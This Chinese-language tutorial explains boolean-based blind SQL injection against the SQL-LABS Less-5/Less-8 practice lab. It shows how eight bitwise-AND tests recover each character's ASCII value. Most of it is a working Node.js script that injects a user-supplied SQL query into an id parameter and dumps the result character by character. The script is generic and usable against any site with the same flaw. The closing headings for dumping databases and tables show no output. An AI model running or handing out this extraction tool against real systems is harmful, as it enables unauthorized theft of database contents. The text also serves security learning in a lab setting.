原理
基于SQL-LABS LESS-5,LESS-8 GET型布尔注入,(布尔盲注详解),,基于MSQL 布尔盲注,主要是判断ascii码值是否与猜测的值相同,通过判断页面变化,确定ascii值
由于0-z
的ascii值是48-122,256 = 2 ^ 0 + 2 ^ 1 + 2 ^ 2 + 2 ^ 3 + 2 ^ 4 +2 ^ 5 + 2 ^ 6 + 2^ 7
,通过按位与运算8次,结果相加得到相应的ascii值,进而得到对应的字符
115 -> 01110011
2^0 -> 00000001 = 1 115 & 2^0 = 1
2^1 -> 00000010 = 2 115 & 2^1 = 2
2^2 -> 00000100 = 4 115 & 2^2 = 0
2^3 -> 00001000 = 8 115 & 2^3 = 0
2^4 -> 00010000 = 16 115 & 2^4 = 16
2^5 -> 00100000 = 32 115 & 2^5 = 32
2^6 -> 01000000 = 64 115 & 2^6 = 64
2^7 -> 10000000 = 128 115 & 2^7 = 0
ascii(s) = 115 = 1+2+16+32+64 = 115 = 's'
通过此特性,构造Get请求,循环url,得到ascii码值,一个ascii码值需要执行8次按位与,只需要判断页面的变化,记录按位与得到的值,最后相加并转换得到一个字符,当转换的ascii码 = 0的时候,表示没有字符了,即可退出循环,并打印该字符
代码
const axios = require('axios')
const readline = require('readline')
const rl = readline.createInterface({
input: process.stdin,
output: process.stdout
})
async function inject(url) {
console.log('[+] paylod:' + url)
let res = await axios.get(url)
const regex = /You are in/
if (regex.test(res.data)) {
return parseInt(url.match(/\d+\--+/)[0].replace(/\D+/, ''))
} else {
return 0
}
}
async function main() {
console.log('[+]Please enter Url')
let url = await new Promise((reslove, reject) => {
rl.on('line', line => {
reslove(line)
})
})
console.log('[+]Please enter SQL')
let sql = await new Promise((reslove, reject) => {
rl.on('line', line => {
reslove(line)
rl.close()
})
})
let result = ''
let index = 1
let flag = true
while (flag) {
let sumAscii = 0
for (i = 0; i < 8; i++) {
let str = url + `?id=1' and ascii(substr((${sql}),${index},1)) %26 ${Math.pow(2, i)} = ${Math.pow(2, i)}--+`
sumAscii += await inject(str)
}
if (sumAscii === 0) {
flag = false
} else {
result += String.fromCharCode(sumAscii)
++index
}
}
console.log('\n[+]Inject_Result:' + sql + ' = ' + result)
}
main()
结果
- 爆库
- 爆表